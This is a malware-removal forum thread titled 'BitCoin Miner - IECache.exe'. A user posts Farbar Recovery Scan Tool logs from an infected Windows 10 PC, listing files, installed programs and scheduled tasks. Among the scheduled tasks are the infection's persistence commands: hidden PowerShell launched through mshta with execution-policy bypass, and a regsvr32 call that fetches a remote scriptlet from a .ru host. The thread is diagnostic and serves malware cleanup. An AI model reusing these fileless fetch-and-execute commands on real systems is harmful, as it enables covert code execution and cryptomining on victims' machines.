2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sr-Cyrl-RS
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sr-Cyrl-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\sd-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\rw-RW
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\quc-Latn-GT
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\pa-Arab-PK
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\nso-ZA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ku-Arab-IQ
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ig-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\chr-CHER-US
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ha-Latn-NG
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\ca-ES-valencia
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\bs-Latn-BA
2018-08-15 01:41 - 2018-04-12 17:52 - 000000000 ____D C:\Windows\system32\az-Latn-AZ
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\SysWOW64\F12
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\F12
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\DiagSvcs
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ___RD C:\Program Files\Windows Defender
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\TextInput
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\ShellExperiences
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\bcastdvr
2018-08-15 01:41 - 2018-04-12 01:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-08-14 21:27 - 2018-06-03 02:24 - 000000000 ____D C:\Windows\system32\MRT
2018-08-14 21:26 - 2018-06-03 02:24 - 137343192 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2018-08-14 21:26 - 2018-04-12 01:30 - 000000000 ____D C:\Windows\CbsTemp
2018-08-11 19:36 - 2018-06-16 15:34 - 000000000 ____D C:\Users\cheat\Documents\Euro Truck Simulator 2
2018-08-11 16:37 - 2018-06-09 19:04 - 000000000 ____D C:\Users\cheat\AppData\Local\JDownloader v2.0
2018-08-10 14:14 - 2018-07-16 23:25 - 000003958 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1531776355
2018-08-10 14:14 - 2018-07-16 23:25 - 000001078 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prohlížeč Opera.lnk
2018-08-10 14:14 - 2018-07-16 23:25 - 000000000 ____D C:\Program Files\Opera
2018-08-10 00:19 - 2018-06-02 23:14 - 000002502 _____ C:\Users\cheat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-08-10 00:19 - 2018-06-02 23:14 - 000002465 _____ C:\Users\cheat\Desktop\Google Chrome.lnk
2018-08-06 17:19 - 2018-04-12 01:41 - 000836480 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-08-06 17:19 - 2018-04-12 01:41 - 000181120 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2018-08-06 14:19 - 2018-06-16 23:35 - 000000000 ____D C:\Users\cheat\AppData\Local\ElevatedDiagnostics
2018-08-04 23:20 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\NDF
2018-07-29 23:36 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\FxsTmp
2018-07-29 15:25 - 2018-06-03 00:05 - 000000000 ____D C:\Windows\Panther
2018-07-29 15:20 - 2018-04-12 01:38 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-07-29 15:20 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2018-07-29 15:15 - 2018-06-09 17:16 - 000008613 _____ C:\Windows\diagwrn.xml
2018-07-29 15:15 - 2018-06-09 17:16 - 000003813 _____ C:\Windows\diagerr.xml
2018-07-28 21:42 - 2018-06-03 16:14 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2018-07-28 21:41 - 2018-06-03 16:14 - 000000000 ____D C:\Program Files\Rockstar Games
2018-07-28 21:30 - 2018-06-02 23:10 - 000000000 ____D C:\Users\cheat\AppData\Local\Packages
2018-07-27 22:21 - 2018-06-09 17:39 - 000000000 ____D C:\Users\cheat\AppData\LocalLow\Mozilla
2018-07-26 00:28 - 2018-04-12 17:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ___SD C:\Windows\system32\UNP
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ___RD C:\Windows\PrintDialog
2018-07-26 00:28 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\system32\ShellExperiences
2018-07-25 21:40 - 2018-06-03 22:09 - 000000000 ____D C:\Users\cheat\AppData\Local\Ubisoft Game Launcher

==================== Files in the root of some directories =======

2018-08-17 20:21 - 2018-08-23 21:18 - 296048640 __RSH () C:\Users\cheat\AppData\Roaming\sui.exe

Files to move or delete:
====================



Some files in TEMP:
====================
2018-08-17 21:15 - 2018-08-03 01:54 - 035345904 _____ (Digital Wave Ltd ) C:\Users\cheat\AppData\Local\Temp\FreeYouTubeDownload_4.1.82.802_d.exe
2018-08-09 02:26 - 2018-08-02 13:38 - 045663912 _____ (jooseng/www.PortableAppZ.ru) C:\Users\cheat\AppData\Local\Temp\Setup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-06-02 23:05

==================== End of FRST.txt ============================

Cryman
Visitor
Posts: 6
Registered: 08 Nov 2014 12:18

Re: BitCoin Miner - IECache.exe

#2 Post by Cryman »

Addition log

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23.08.2018
Ran by cheat (24-08-2018 21:36:05)
Running from C:\Users\cheat\Desktop
Windows 10 Pro Version 1803 17134.228 (X64) (2018-06-02 21:08:15)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1409225181-4065645274-1912239689-500 - Administrator - Disabled)
cheat (S-1-5-21-1409225181-4065645274-1912239689-1002 - Administrator - Enabled) => C:\Users\cheat
DefaultAccount (S-1-5-21-1409225181-4065645274-1912239689-503 - Limited - Disabled)
Guest (S-1-5-21-1409225181-4065645274-1912239689-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1409225181-4065645274-1912239689-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
AI Suite 3 (HKLM-x32\...\{D46DA5F0-25AD-4B77-98DA-6DD6AF39FBD9}) (Version: 1.00.56 - ASUSTeK Computer Inc.)
Aktualizace NVIDIA 31.2.0.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 31.2.0.0 - NVIDIA Corporation) Hidden
Apple Mobile Device Support (HKLM\...\{64695C4A-C68F-46B5-A734-50EBF124A68E}) (Version: 11.3.3.4 - Apple Inc.)
ASUS GLCKIO2 Driver (HKLM-x32\...\{548dd834-70c5-4426-8065-fbeabdd2bb5d}) (Version: 1.0.10 - ASUSTeK Computer Inc.) Hidden
ASUS GLCKIO2 Driver (HKLM-x32\...\{5960FD0F-BB3B-49AF-B175-F77DC91E995A}) (Version: 1.0.10 - ASUSTeK Computer Inc.) Hidden
ASUS GPU TweakII (HKLM-x32\...\{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.6.2.0 - ASUSTek COMPUTER INC.) Hidden
ASUS GPU TweakII (HKLM-x32\...\InstallShield_{0075AAC2-EA9F-490E-83F7-5D5F81EB2A43}) (Version: 1.6.2.0 - ASUSTek COMPUTER INC.)
ASUS ROG Gaming Mouse GX1000 V1.0 (HKLM-x32\...\{DBDEF130-96CB-4999-B6E1-06594BD0EDD6}_is1) (Version: 1.00.00.00 - )
Asus Sonic Suite Plugins (HKLM-x32\...\{f0c1caa6-9d8d-47a9-b9a0-1d83ded7e857}) (Version: 1.2.401 - ASUSTeKcomputer.Inc) Hidden
ASUS Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.101.0 - ASUSTeK Computer Inc.) Hidden
AURA (HKLM-x32\...\{5899CD4F-8764-4303-A0D9-C60A62CFC24F}) (Version: 1.06.29 - ASUSTeK Computer Inc.)
AURA DRAM Component (HKLM\...\{3881F403-B6B7-4D2F-BDAC-7901EB677F52}) (Version: 1.0.4 - ASUS) Hidden
AURA DRAM Component (HKLM-x32\...\{c23c281b-0c0f-4c58-b069-92db94049ad0}) (Version: 1.0.4 - ASUS) Hidden
AURA Service (HKLM-x32\...\{0E536061-3B55-4D45-BF58-0BDA261C94B0}) (Version: 1.00.33 - ASUSTeK Computer Inc.) Hidden
AURA Service (HKLM-x32\...\{5adb80f9-1040-4375-8c2c-9eea2624cbf7}) (Version: 1.00.33 - ASUSTeK Computer Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Battlefield 1 (HKLM-x32\...\Battlefield 1_is1) (Version: - )
Bethesda.net Launcher (HKLM-x32\...\{3448917E-E4FE-4E30-9502-9FD52EABB6F5}_is1) (Version: 1.36.2 - Bethesda Softworks)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Corsair AURA DRAM Component (HKLM\...\{376E0869-A4F1-4DC7-A1FD-EBF3AFFEB832}) (Version: 1.0.3 - CORSAIR COMPONENTS INC.) Hidden
Corsair AURA DRAM Component (HKLM-x32\...\{0589c0a4-38f0-40bc-9296-8be22aa26522}) (Version: 1.0.3 - CORSAIR COMPONENTS INC.) Hidden
Creation Kit: Fallout 4 (HKLM-x32\...\Creation Kit: Fallout 4) (Version: - Bethesda Softworks)
Crysis 3 (HKLM-x32\...\{EE648111-C93F-46B5-B425-E643F63BFDFD}_is1) (Version: - )
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Direct Video Downloader version 2.12 (HKLM-x32\...\{5FB07C70-45DA-45C9-AAD3-F805D4C463D5}_is1) (Version: 2.12 - Major Share, MajorShare.com)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 398.36 - NVIDIA Corporation) Hidden
Focusrite USB 4.36.5.0 (HKLM\...\Focusrite USB_is1) (Version: 4.36.5.0 - Focusrite Audio Engineering Ltd.)
FormatFactory 4.3.0.0 (HKLM-x32\...\FormatFactory) (Version: 4.3.0.0 - Free Time)
Free YouTube Download (HKLM-x32\...\Free YouTube Download_is1) (Version: 4.1.82.802 - Digital Wave Ltd)
Google Chrome (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Google Chrome) (Version: 68.0.3440.106 - Google Inc.)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine)
Intel Extreme Tuning Utility (HKLM-x32\...\{1d91bf86-43a0-4b7a-8fdf-76c3bfb5a36f}) (Version: 6.4.1.23 - Intel Corporation)
Intel Extreme Tuning Utility (HKLM-x32\...\{FA506D5A-CCF5-4D4D-A218-FFB31F36EACF}) (Version: 6.4.1.23 - Intel Corporation) Hidden
Intel Processor Diagnostic Tool 64bit (HKLM\...\{3D0D4C18-4C13-4890-B55D-764150A35E0C}) (Version: 4.1.0.27 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.6.1194 - Intel Corporation)
Intel(R) Network Connections 23.1.100.0 (HKLM\...\PROSetDX) (Version: 23.1.100.0 - Intel)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
Java 8 Update 181 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180181F0}) (Version: 8.0.1810.13 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kingo ROOT version 1.5.8.3353 (HKLM-x32\...\{AE7675D6-0B31-494F-ABFA-822E1A0FDF17}_is1) (Version: 1.5.8.3353 - Kingosoft Technology Ltd.)
Kingston AURA DRAM Component (HKLM\...\{6D2D2DAF-BFE4-45A6-BF40-8A9F7FF54F42}) (Version: 1.0.3 - KINGSTON COMPONENTS INC.) Hidden
Kingston AURA DRAM Component (HKLM-x32\...\{a1697240-f3cf-483c-a9d2-3cd9e5bf3615}) (Version: 1.0.3 - KINGSTON COMPONENTS INC.) Hidden
MakeMKV v1.12.3 (HKLM-x32\...\MakeMKV) (Version: v1.12.3 - GuinpinSoft inc)
Malwarebytes verze 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft OneDrive (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\OneDriveSetup.exe) (Version: 18.095.0510.0001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.13.26020 (HKLM-x32\...\{7474cd6e-76cc-4257-837e-5b9261e526af}) (Version: 14.13.26020.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.13.26020 (HKLM-x32\...\{5c045b7f-e561-4794-91f8-c6cda0893107}) (Version: 14.13.26020.0 - Microsoft Corporation)
MiniTool Partition Wizard Free 10.2.3 (HKLM\...\{05D996FA-ADCB-4D23-BA3C-A7C184A8FAC6}_is1) (Version: - MiniTool Solution Ltd.)
MotoGP 18 (HKLM-x32\...\MotoGP 18_is1) (Version: - )
Mozilla Firefox 61.0.1 (x64 cs) (HKLM\...\Mozilla Firefox 61.0.1 (x64 cs)) (Version: 61.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 60.0.2 - Mozilla)
NahimicSettingsConfigurator (HKLM\...\{3094F0B9-A3E1-4A01-9B0F-2531645C72CF}) (Version: 1.2.401 - ASUSTeKcomputer.Inc) Hidden
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.65.2 - Black Tree Gaming)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.5.6 - Notepad++ Team)
NVIDIA GeForce Experience 3.14.0.139 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.14.0.139 - NVIDIA Corporation)
NVIDIA Ovladač 3D Vision 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 398.36 - NVIDIA Corporation)
NVIDIA Ovladač HD audia 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA Ovladač řídící jednotky 3D Vision 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 398.36 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 21.1.2 - OBS Project)
Opera Stable 54.0.2952.71 (HKLM-x32\...\Opera 54.0.2952.71) (Version: 54.0.2952.71 - Opera Software)
Oracle VM VirtualBox 5.2.12 (HKLM\...\{128AD467-F107-4FED-A283-F355E74DE103}) (Version: 5.2.12 - Oracle Corporation)
Ovládací panel NVIDIA 398.36 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 398.36 - NVIDIA Corporation) Hidden
Patriot Viper RGB (HKLM\...\{E42E13B0-071E-49C1-B1CC-58198E82F302}) (Version: 1.00.02 - Patriot Memory) Hidden
Patriot Viper RGB (HKLM-x32\...\{d549ba94-f6a7-4153-9c75-2e40ec8e1c8e}) (Version: 1.00.02 - Patriot Memory)
PE Explorer 1.99 R6 (HKLM-x32\...\PE Explorer_is1) (Version: 1.99.6 - Heaventools Software)
Podpora aplikací Apple (32bitová) (HKLM-x32\...\{C56BA005-F02C-461B-ACA5-A0CE3E32578F}) (Version: 6.5 - Apple Inc.)
Podpora aplikací Apple (64bitová) (HKLM\...\{C8087B7C-8496-45BE-92FB-91D31EB73969}) (Version: 6.5 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8186 - Realtek Semiconductor Corp.)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.2.4.0 - Rockstar Games)
ShareX (HKLM\...\82E6AC09-0FEF-4390-AD9F-0DD3F5561EFC_is1) (Version: 12.2.0 - ShareX Team)
Sonic Radar (HKLM\...\{0FB2E1BE-0747-468A-AD6B-4043B7BDDED5}) (Version: 1.2.401 - ASUSTeKcomputer.Inc)
SpaceEngine verze 0.9.8.0 (HKLM-x32\...\{6E7A40FA-86CE-4844-A7DC-F8769F21A62F}_is1) (Version: 0.9.8.0 - SpaceEngine)
Spotify (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Spotify) (Version: 1.0.88.353.g15c26ea1 - Spotify AB)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steam Customizer (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\Steam Customizer) (Version: 1.00.00.00 - Blumont)
Stellarium 0.18.1 (HKLM\...\Stellarium_is1) (Version: 0.18.1 - Stellarium team)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.1.3629 - TeamViewer)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.12 - Ghisler Software GmbH)
TruckersMP Launcher 1.0.0.4 (HKLM\...\{A227B892-C548-4490-9C5D-DB341F8194A6}_is1) (Version: 1.0.0.4 - TruckersMP Team)
Uplay (HKLM-x32\...\Uplay) (Version: 60.0 - Ubisoft)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.3 - VideoLAN)
Winaero Tweaker (HKLM\...\Winaero Tweaker_is1) (Version: 0.10.2.0 - Winaero)
WinDirStat 1.1.2 (HKU\S-1-5-21-1409225181-4065645274-1912239689-1002\...\WinDirStat) (Version: - )
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
Wireshark 2.6.2 64-bit (HKLM-x32\...\Wireshark) (Version: 2.6.2 - The Wireshark developer community, hxxps://www.wireshark.org)
Yousician Launcher version 1.0 (HKLM-x32\...\{EF45EAE9-523E-47C3-8634-A81923B11DD5}_is1) (Version: 1.0 - Yousician)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}\localserver32 -> C:\Users\cheat\AppData\Local\Google\Chrome\Application\68.0.3440.106\notification_helper.exe (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1409225181-4065645274-1912239689-1002_Classes\CLSID\{EA724FD3-844D-43A9-A8C9-A5BC35FC20E4}\InprocServer32 -> C:\Users\cheat\AppData\Local\Google\Update\1.3.33.17\psuser_64.dll (Google Inc.)
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2018-03-30] (Tonec Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2018-03-19] ()
ContextMenuHandlers1: [FormatFactoryShell] -> {A3777921-CFD3-4A6B-89BF-08E6B95716E8} => C:\Program Files (x86)\FormatFactory\ShellEx64_104.dll [2018-03-19] (Free Time)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers4: [FormatFactoryShell] -> {A3777921-CFD3-4A6B-89BF-08E6B95716E8} => C:\Program Files (x86)\FormatFactory\ShellEx64_104.dll [2018-03-19] (Free Time)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-06-24] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {01DE9554-77CF-4DCD-856C-1D35CD0DC839} - System32\Tasks\ASUS\AsRogAuraGpuDllServer => C:\Program Files (x86)\LightingService\\AsRogAuraGpuDllServer.exe [2018-04-25] ()
Task: {05375E1B-5499-4980-9F05-704620108A27} - System32\Tasks\SystemSettings => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {0BDF41B0-6EED-4C97-83DC-A6F42AF0AF96} - System32\Tasks\WindowsUpdateTool => regsvr32 /s /n /u /i:hxxp://googleprovider.ru/y.sct scrobj.dll <==== ATTENTION
Task: {115AC25A-F716-47CB-AF6B-7FFB463DAC42} - System32\Tasks\GPU Tweak II => C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe [2018-03-26] (ASUSTeK COMPUTER INC.)
Task: {1BBF7EE4-F4BD-478F-8400-222AA8FF2CA8} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2013-08-08] ()
Task: {2277E42E-F290-4C64-A4E4-ACDE1BC03BF0} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-05-23] (NVIDIA Corporation)
Task: {2F225687-E7A1-48D5-AF68-1E53AD3FBEED} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-05-23] (NVIDIA Corporation)
Task: {380034C3-C735-46E7-8194-3F1C5ABBFC82} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-05-23] (NVIDIA Corporation)
Task: {3E7D1B43-B03C-4F51-A016-009FB90E7270} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-05-23] (NVIDIA Corporation)
Task: {471298CA-6FF7-4704-AE3F-8241BCEC462A} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-05-23] (NVIDIA Corporation)
Task: {4A971A56-40FF-43C8-A489-C3A6202387EE} - System32\Tasks\anydesk => C:\Users\cheat\AppData\Local\Temp\setupm.js [2018-07-27] () <==== ATTENTION
Task: {5B5D9814-A23C-48F0-B72B-36EC161EAECF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.16.17656.18052-0\MpCmdRun.exe [2018-06-03] (Microsoft Corporation)
Task: {63904DC6-2EBE-443C-BEB5-B302416D4F84} - System32\Tasks\SystemSettingss => mshta vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -WindowStyle hidden -ep bypass -nop -c $e=(Get-ItemProperty HKLM:\Software\WOW6432Node\a);Select-Object -ExpandProperty Shell;Invoke-Expression $e",0,True)(window.close)
Task: {65B85F6F-35B3-4459-A179-28255D5B7B25} - System32\Tasks\Microsoft\Windows\HelloFace\FODCleanupTask => C:\Windows\System32\WinBioPlugIns\FaceFodUninstaller.exe [2018-04-12] ()
Task: {67AA10A0-CBBA-49C7-AA5E-5C8283AC6325} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-05-23] (NVIDIA Corporation)
Task: {67C044D2-42AC-4993-9B36-C2994E608238} - System32\Tasks\S-1-5-21-1409225181-4065645274-1912239689-1002\DataSenseLiveTileTask => C:\Windows\System32\DataUsageLiveTileTask.exe [2018-04-12] (Microsoft Corporation)
Task: {6AA2DAFE-A960-4009-9DFB-4BAF74335C2C} - System32\Tasks\Opera scheduled Autoupdate 1531776355 => C:\Program Files\Opera\launcher.exe [2018-08-07] (Opera Software)
